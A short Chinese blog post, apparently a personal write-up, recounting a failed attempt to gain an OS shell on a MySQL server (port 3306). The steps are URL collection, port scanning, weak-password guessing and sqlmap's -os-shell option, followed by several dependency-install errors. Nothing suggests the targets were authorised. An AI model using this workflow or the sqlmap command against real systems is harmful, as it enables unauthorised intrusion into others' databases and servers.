sqlmap拿3306的shell

前提

首先采集网站url,然后通过url域名转化为ip,再通过端口扫描探测出想要的端口,比如3306

然后进行弱口令探测

然后我探测出某弱口令

拿shell

登上服务器,首先安装sqlmap

wget https://github.com/sqlmapproject/sqlmap/tarball/master

tar -zxvf master
cd sqlmapproject-sqlmap-de63238/
成功
python2 sqlmap.py -d "mysql://root:[email protected]:3306/mysql" -os-shell

提示报错


image.png

需要“python pymysql”第三方库

python2 -m pip install pymysql
报错

换了一台服务器 python2.6.6

python sqlmap.py -d "mysql://root:[email protected]:3306/mysql" -os-shell

先安装pip

curl https://bootstrap.pypa.io/2.6/get-pip.py -o get-pip.py
python get-pip.py
pip install pymysql

再次运行 还是不行


image.png

网上参考到直接github下载组件


组件

我直接本机安装 然后可以运行了 不过把MySQL服务判断为了oracle


orcale

....结局利用sqlmap拿shell失败

你可能感兴趣的:(sqlmap拿3306的shell)